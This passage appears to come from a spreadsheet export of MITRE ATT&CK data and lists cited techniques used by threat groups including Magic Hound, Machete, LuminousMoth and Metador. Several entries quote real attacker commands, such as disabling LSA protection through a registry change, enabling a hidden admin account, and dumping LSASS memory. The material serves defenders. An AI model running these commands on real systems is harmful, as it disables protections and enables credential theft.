    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has used malicious DLLs that setup persistence in the Registry Key `HKCU\Software\Microsoft\Windows\Current Version\Run`.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--856db86a-62a6-4545-898f-7eb44924cfde</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has used malicious DLLs to spread malware to connected removable USB drives on infected machines.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--242a60b4-114e-4dc5-9577-72dfd375a93c</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has created scheduled tasks to establish persistence for their tools.(Citation: Bitdefender LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--b47be693-c3f4-4f21-ba08-4e2fe170bc51</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has sent spearphishing emails containing a malicious Dropbox download link.(Citation: Kaspersky LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--03c424ec-df52-4b08-8b32-fa8b2a738a97</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has used an unnamed post-exploitation tool to steal cookies from the Chrome browser.(Citation: Kaspersky LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--002f1039-f4c5-4c60-b8ac-ced374bec2ac</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has used a malicious DLL to collect the username from compromised hosts.(Citation: Bitdefender LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--986f3f81-7872-4c99-a704-4e53f2936e26</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has obtained an ARP spoofing tool from GitHub.(Citation: Bitdefender LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--5ff56332-1e9e-4853-baae-5918e41882ac</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has hosted malicious payloads on Dropbox.(Citation: Kaspersky LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--18ba352d-274c-4cb5-8916-d95035a2423c</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has used HTTP for C2.(Citation: Kaspersky LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--4688dc57-9101-4f37-a2e3-9b89da7634ed</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/groups/G0095) has distributed [Machete](https://attack.mitre.org/software/S0409) through a fake blog website.(Citation: Securelist Machete Aug 2014)</t>
  </si>
  <si>
    <t>relationship--bb2be1f4-f2fc-4029-8ee6-e89f52210dfd</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</si>
  <si>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</si>
  <si>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relationship--0f880e99-efaa-4e85-91c3-cac3d81d6b9a</t>
  </si>
  <si>
    <t>15 October 2019</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/groups/G0095) has has relied on users opening malicious links delivered through spearphishing to execute malware.(Citation: Cylance Machete Mar 2017)(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t>relationship--ba84c2c2-e5bf-432e-9827-6d622490ba2d</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/groups/G0095)'s [Machete](https://attack.mitre.org/software/S0409) MSI installer has masqueraded as a legitimate Adobe Acrobat Reader installer.(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>relationship--b19ae2dc-9cbe-45b8-8b9c-ce0cd9add29a</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/groups/G0095) has used msiexec to install the [Machete](https://attack.mitre.org/software/S0409) malware.(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>relationship--d3e2ba96-28bb-48be-b46b-3c2349f4d0cd</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</si>
  <si>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</si>
  <si>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relationship--532feb00-b2ba-4cf6-81e8-57750d30b039</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/groups/G0095) has created scheduled tasks to maintain [Machete](https://attack.mitre.org/software/S0409)'s persistence.(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>relationship--818dc2b8-bc95-4e1e-a25a-8c659b9a141d</t>
  </si>
  <si>
    <t xml:space="preserve"> [Machete](https://attack.mitre.org/groups/G0095) has delivered spearphishing emails that contain a zipped file with malicious contents.(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>relationship--bd3926e9-9c91-43f2-913d-16a7e94cc0ae</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/groups/G0095) has sent phishing emails that contain a link to an external server with ZIP and RAR archives.(Citation: Cylance Machete Mar 2017)(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t>relationship--2dde02b3-20b9-4709-96b4-02dbb9150577</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/groups/G0095) has embedded malicious macros within spearphishing attachments to download additional files.(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>relationship--472878d3-3a6a-4ad2-8fcf-e73a74fd48b6</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/groups/G0095) has used batch files to initiate additional downloads of malicious files.(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>relationship--3a01d374-1a49-4443-b7b5-453ebe5671ea</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has added a user named DefaultAccount to the Administrators and Remote Desktop Users groups.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>relationship--8c4a2bd5-109b-4e49-ae67-a9bf02a029e7</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</si>
  <si>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</si>
  <si>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relationship--7e636340-8b64-4913-be75-a8e62f68fc91</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware has used IRC for C2.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--2b5af448-59a1-4888-a05f-aee6105872a5</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used gzip to archive dumped LSASS process memory and RAR to stage and compress local folders.(Citation: FireEye APT35 2018)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--d8609889-3d3e-4f6c-8f52-03ec41876b4d</t>
  </si>
  <si>
    <t>11 January 2023</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware can use a SOAP Web service to communicate with its C2 server.(Citation: Unit 42 Magic Hound Feb 2017)</t>
  </si>
  <si>
    <t>relationship--79f89b33-046c-4bfa-a12d-c50fa0d84ea6</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has removed mailbox export requests from compromised Exchange servers.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>relationship--b5cd5028-8d4c-4564-921e-be3a34a5212d</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used base64-encoded commands.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: Microsoft Iranian Threat Actor Trends November 2021)</t>
  </si>
  <si>
    <t>relationship--5829ee6d-68e4-44a8-828e-ba188b14c163</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</si>
  <si>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</si>
  <si>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relationship--078fb58f-0b5b-4021-8467-800893c35d08</t>
  </si>
  <si>
    <t>10 March 2021</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used BitLocker and DiskCryptor to encrypt targeted workstations. (Citation: DFIR Phosphorus November 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021)</t>
  </si>
  <si>
    <t>relationship--30da3c92-05b8-40fd-b8b6-29cb20a597a1</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used a web shell to exfiltrate a ZIP file containing a dump of LSASS memory on a compromised machine.(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--e9ca5d3c-cd22-41d6-a81a-97ae51cf32ff</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) enabled and used the default system managed account, DefaultAccount, via `"powershell.exe" /c net user DefaultAccount /active:yes` to connect to a targeted Exchange server over RDP.(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--815e257d-f4bf-4124-8063-634d6710d66f</t>
  </si>
  <si>
    <t>09 January 2023</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has collected location information from visitors to their phishing sites.(Citation: Google Iran Threats October 2021)</t>
  </si>
  <si>
    <t>relationship--20a3c703-46d5-4038-9b3f-9afe15d84023</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has executed scripts to disable the event log service.(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--8f6be9bc-b570-442e-9feb-7802a87c161e</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</si>
  <si>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</si>
  <si>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relationship--a83683c2-87ee-486e-bb21-0d511c5461ef</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has disabled antivirus services on targeted systems in order to upload malicious payloads.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>relationship--9519bd66-c84a-4063-bf64-d17262ce6684</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used domain administrator accounts after dumping LSASS process memory.(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--d3db2181-a79e-49df-b169-f6b7c52fd7a5</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used a web shell to execute `nltest /trusted_domains` to identify trust relationships.(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--cfbff9fe-2d62-4d80-b7b8-b35e84189803</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has registered fraudulent domains such as "mail-newyorker.com" and "news12.com.recover-session-service.site" to target specific victims with phishing attacks.(Citation: Certfa Charming Kitten January 2021)</t>
  </si>
  <si>
    <t>relationship--c4b6c967-54d8-4ba5-9016-5d0ef0b6cc0b</t>
  </si>
  <si>
    <t>03 May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</si>
  <si>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</si>
  <si>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relationship--134cc6c4-30f8-4b85-8ea1-da19c3e92af9</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has conducted watering-hole attacks through media and magazine websites.(Citation: ClearSky Kittens Back 3 August 2020)</t>
  </si>
  <si>
    <t>relationship--ff16b0d1-e77c-4985-85cb-842da787daf3</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used Powershell to discover email accounts.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>relationship--45ce4803-9ed5-4960-ac34-7fe3b22919d5</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has compromised personal email accounts through the use of legitimate credentials and gathered additional victim information.(Citation: IBM ITG18 2020)</t>
  </si>
  <si>
    <t>relationship--32126e79-18ce-4393-a555-50aa34760da9</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has established email accounts using fake personas for spearphishing operations.(Citation: IBM ITG18 2020)(Citation: Proofpoint TA453 March 2021)</t>
  </si>
  <si>
    <t>relationship--1a163c8a-7a12-4cd4-813f-38f5a05ba98d</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has identified high-value email accounts in academia, journalism, NGO's, foreign policy, and national security for targeting.(Citation: Proofpoint TA453 July2021)(Citation: Google Iran Threats October 2021)</t>
  </si>
  <si>
    <t>relationship--76ecca4d-15ba-4285-baa9-1cf03799dbeb</t>
  </si>
  <si>
    <t>01 September 2021</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has compromised email credentials in order to steal sensitive data.(Citation: Certfa Charming Kitten January 2021)</t>
  </si>
  <si>
    <t>relationship--966e98f6-1460-4305-8993-57ee3f3f5654</t>
  </si>
  <si>
    <t>02 June 2021</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used an encrypted http proxy in C2 communications.(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--665e5a7f-e575-44c7-839d-4c69f14238d2</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used the Telegram API `sendMessage` to relay data on compromised devices.(Citation: Google Iran Threats October 2021)</t>
  </si>
  <si>
    <t>relationship--043ea873-396a-4ba8-a3e3-1f9af11c986e</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</si>
  <si>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</si>
  <si>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relationship--54af36a6-0a08-4853-9002-a1ae51b22ca5</t>
  </si>
  <si>
    <t>12 January 2023</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has deleted and overwrote files to cover tracks.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--7f17927d-b371-42c4-bd68-0c5c57e3edab</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware can list a victim's logical drives and the type, as well the total/free space of the fixed devices. Other malware can list a directory's contents.(Citation: Unit 42 Magic Hound Feb 2017)</t>
  </si>
  <si>
    <t>relationship--87b8b451-bf9b-4e93-b591-05ef502970f5</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has acquired mobile phone numbers of potential targets, possibly for mobile malware or additional phishing operations.(Citation: Proofpoint TA453 July2021)</t>
  </si>
  <si>
    <t>relationship--d0946a00-610b-44d3-aec6-be292cfac52a</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware has a function to determine whether the C2 server wishes to execute the newly dropped file in a hidden window.(Citation: Unit 42 Magic Hound Feb 2017)</t>
  </si>
  <si>
    <t>relationship--e60f4fce-425c-45f5-a6f3-ee6c3f808fb9</t>
  </si>
  <si>
    <t>15 August 2019</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has captured the IP addresses of visitors to their phishing sites.(Citation: Google Iran Threats October 2021)</t>
  </si>
  <si>
    <t>relationship--62fe41c2-3ee6-45eb-a38e-a6c27d151933</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has disabled LSA protection on compromised hosts using `"reg" add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f`.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>relationship--e65b247d-3d19-43d9-b26c-f1a068040d68</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</si>
  <si>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</si>
  <si>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relationship--47f521b8-37e4-489d-b6eb-25f35de80aae</t>
  </si>
  <si>
    <t xml:space="preserve">[Magic Hound](https://attack.mitre.org/groups/G0059) has conducted a network call out to a specific website as part of their initial discovery activity.(Citation: DFIR Phosphorus November 2021) </t>
  </si>
  <si>
    <t>relationship--31f93f78-799b-4f65-892c-da3aba4bb32d</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware is capable of keylogging.(Citation: Unit 42 Magic Hound Feb 2017)</t>
  </si>
  <si>
    <t>relationship--023ff141-8ed7-4132-85a0-494fe075236b</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</si>
  <si>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</si>
  <si>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relationship--98d076a5-9640-4337-a5a0-27c0c8a3374b</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has copied tools within a compromised network using RDP.(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--9e0ca319-ad80-48f8-812e-fe7f9e0e77c4</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has created local accounts named `help` and `DefaultAccount` on compromised machines.(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: Microsoft Iranian Threat Actor Trends November 2021)</t>
  </si>
  <si>
    <t>relationship--a26397b4-7959-40d7-953c-c2afec8a1f80</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has collected .PST archives.(Citation: FireEye APT35 2018)</t>
  </si>
  <si>
    <t>relationship--b6336d7c-e869-4491-9e8a-5ea5847a58ae</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has attempted to lure victims into opening malicious email attachments.(Citation: ClearSky Kittens Back 3 August 2020)</t>
  </si>
  <si>
    <t>relationship--56d37b60-03e0-4aac-b106-0350c2a4ec46</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has attempted to lure victims into opening malicious links embedded in emails.(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)</t>
  </si>
  <si>
    <t>relationship--77a98e76-5a38-40a8-af9a-180c31bf7563</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has named a malicious script CacheTask.bat to mimic a legitimate task.(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--c235df18-28b1-48f9-bcfb-38f671005b5e</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</si>
  <si>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</si>
  <si>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relationship--8ab4fa22-a24c-4596-996e-4abf190521da</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has modified Registry settings for security tools.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>relationship--cacbb779-a901-470f-9bb2-cc2d98088713</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used KPortScan 3.0 to perform SMB, RDP, and LDAP scanning.(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--5d55b1c4-cdf4-4314-881e-ba0c853b1b60</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware has communicated with its C2 server over TCP ports 4443 and 10151 using HTTP.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--b35cd29e-1439-4f7a-a81e-44d4db29cd8b</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware has used base64-encoded files and has also encrypted embedded strings with AES.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: Microsoft Iranian Threat Actor Trends November 2021)</t>
  </si>
  <si>
    <t>relationship--8087d99b-cc05-4e2a-abce-687eb726a9e7</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</si>
  <si>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</si>
  <si>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relationship--110690db-fd9b-425a-9269-ec082f0af3f9</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware can list running processes.(Citation: Unit 42 Magic Hound Feb 2017)</t>
  </si>
  <si>
    <t>relationship--a4c59c09-2abd-4c49-8156-0ccc9214b66e</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used Plink to tunnel RDP over SSH.(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--19bef554-d625-49f9-a521-c6a8ed773083</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used Fast Reverse Proxy (FRP) for RDP traffic.(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--c1205923-690a-4bfb-9116-0a60eb931b26</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware has used Registry Run keys to establish persistence.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Phosphorus November 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021)</t>
  </si>
  <si>
    <t>relationship--0a507d28-ef6b-417b-a968-e82608e8b6a8</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used Remote Desktop Services to copy tools on targeted systems.(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--43c20c81-984f-418a-9202-252a3afbec46</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has exported emails from compromised Exchange servers including through use of the cmdlet `New-MailboxExportRequest.`(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--ad278368-be64-497f-abc3-024ee8447ef8</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used [Ping](https://attack.mitre.org/software/S0097) for discovery on targeted networks.(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--ca948787-ea4b-4022-be96-8baf0ccff834</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used rundll32.exe to execute MiniDump from comsvcs.dll when dumping LSASS memory.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>relationship--57597bcb-9cbc-49d4-adfb-fb4c0fe6090e</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used scheduled tasks to establish persistence and execution.(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--33390e6e-f262-48fb-a74a-084c310b3aa2</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware can take a screenshot and upload the file to its C2 server.(Citation: Unit 42 Magic Hound Feb 2017)</t>
  </si>
  <si>
    <t>relationship--65f7704a-358a-464d-b09b-fee5dd96adf3</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has created fake LinkedIn and other social media accounts to contact targets and convince them--through messages and voice communications--to open malicious links.(Citation: ClearSky Kittens Back 3 August 2020)</t>
  </si>
  <si>
    <t>relationship--e562688d-a5e3-4a17-95dd-8ef7488e015e</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has captured the user-agent strings from visitors to their phishing sites.(Citation: Google Iran Threats October 2021)</t>
  </si>
  <si>
    <t>relationship--3499e2c5-e22a-4e99-ae90-3c7b48aa5ccb</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</si>
  <si>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</si>
  <si>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relationship--808f140e-8b7b-4efa-8708-2f2308b2fc41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</si>
  <si>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</si>
  <si>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relationship--8e03a9bc-a701-4797-8f0e-0eb17f32ddac</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</si>
  <si>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</si>
  <si>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relationship--d432f9c7-1211-4485-bac3-b35edc38d501</t>
  </si>
  <si>
    <t>04 July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</si>
  <si>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</si>
  <si>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relationship--b60dcc78-83b0-4fe2-b874-6f22f99b6087</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware gathers the victim's local IP address, MAC address, and external IP address.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--88c50625-6d02-42fb-aa82-4315a532b754</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used quser.exe to identify existing RDP connections.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>relationship--95df0f16-1c35-4603-baae-4559113f9a0b</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware has obtained the victim username and sent it to the C2 server.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--7ac10827-9bf6-4d60-aa16-9f2d2930b373</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</si>
  <si>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</si>
  <si>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relationship--1134f983-3ad3-4c79-baaa-f604ac9dc642</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware has used VBS scripts for execution.(Citation: Unit 42 Magic Hound Feb 2017)</t>
  </si>
  <si>
    <t>relationship--675f24e0-c445-4eb3-a191-16fb181f6e30</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</si>
  <si>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</si>
  <si>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relationship--6dca82b3-7a95-4fcd-862e-6337eea49306</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used HTTP for C2.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--2dd15583-34cd-4b49-a6ba-4bd647b7ff27</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has acquired Amazon S3 buckets to use in C2.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--f1caf188-3c6b-4b5c-82a5-38a37149f1b1</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used multiple web shells to gain execution.(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--b8bb65e7-3846-4b41-8594-16409a94aa8d</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has collected names and passwords of all Wi-Fi networks to which a device has previously connected.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--11087b2c-2d00-4a57-a974-045010c7bab5</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used the command-line interface for code execution.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--17bc0957-1509-4faf-bb51-a6a9e1959978</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used a tool to run `cmd /c wmic computersystem get domain` for discovery.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>relationship--ee38932c-ab04-4ac5-9ca3-d14cc98f5476</t>
  </si>
  <si>
    <t xml:space="preserve">[Metador](https://attack.mitre.org/groups/G1013) has quickly deleted `cbd.exe` from a compromised host following the successful deployment of their malware.(Citation: SentinelLabs Metador Sept 2022) </t>
  </si>
  <si>
    <t>relationship--bb98709f-9fa6-473a-a5ad-e3bc533e28fa</t>
  </si>
  <si>
    <t>[Metador](https://attack.mitre.org/groups/G1013) has downloaded tools and malware onto a compromised system.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--e3b628b7-1513-4b68-87ab-809316836075</t>
  </si>
  <si>
    <t>[Metador](https://attack.mitre.org/groups/G1013) has used unique malware in their operations, including [metaMain](https://attack.mitre.org/software/S1059) and [Mafalda](https://attack.mitre.org/software/S1060).(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--67c23a08-47ef-4c09-8500-b1d7305ed6b7</t>
  </si>
  <si>
    <t>[Metador](https://attack.mitre.org/groups/G1013) has used TCP for C2.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--c65d4006-003c-4aff-a8c7-bd5834678b58</t>
  </si>
  <si>
    <t>[Metador](https://attack.mitre.org/groups/G1013) has encrypted their payloads.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--b6e5a51c-f730-4514-8ffd-b540d5b4cf23</t>
  </si>
  <si>
    <t>[Metador](https://attack.mitre.org/groups/G1013) has used Microsoft's Console Debugger in some of their operations.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--d13e6112-7edc-4355-b7a7-a29c04016168</t>
  </si>
  <si>
    <t>[Metador](https://attack.mitre.org/groups/G1013) has used HTTP for C2.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--0d116456-322a-470c-a219-6d313f801b89</t>
  </si>
  <si>
    <t>[Metador](https://attack.mitre.org/groups/G1013) has used the Windows command line to execute commands.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--6025ae9c-80d1-4615-9556-174a9ccfef3c</t>
  </si>
  <si>
    <t>[Metador](https://attack.mitre.org/groups/G1013) has established persistence through the use of a WMI event subscription combined with unusual living-off-the-land binaries such as `cdb.exe`.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--944a0e0d-dfb4-4c78-a0bd-601b989365bd</t>
  </si>
  <si>
    <t>[Moafee](https://attack.mitre.org/groups/G0002) has been known to employ binary padding.(Citation: Haq 2014)</t>
  </si>
  <si>
    <t>relationship--83cfa11e-f221-4dc4-b184-943c2c7f4562</t>
  </si>
  <si>
    <t>[Mofang](https://attack.mitre.org/groups/G0103)'s malicious spearphishing attachments required a user to open the file after receiving.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--b91c4f2d-8f21-46e9-a012-967436018eea</t>
  </si>
  <si>
    <t>[Mofang](https://attack.mitre.org/groups/G0103)'s spearphishing emails required a user to click the link to connect to a compromised website.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--78a49769-fec0-4961-a25d-fc5eab623e93</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</si>
  <si>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</si>
  <si>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relationship--8ba71919-c776-4e1b-ad71-160649060d3e</t>
  </si>
  <si>
    <t>[Mofang](https://attack.mitre.org/groups/G0103) delivered spearphishing emails with malicious documents, PDFs, or Excel files attached.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--7b4af425-27a6-4330-85e2-d8d03911d923</t>
  </si>
  <si>
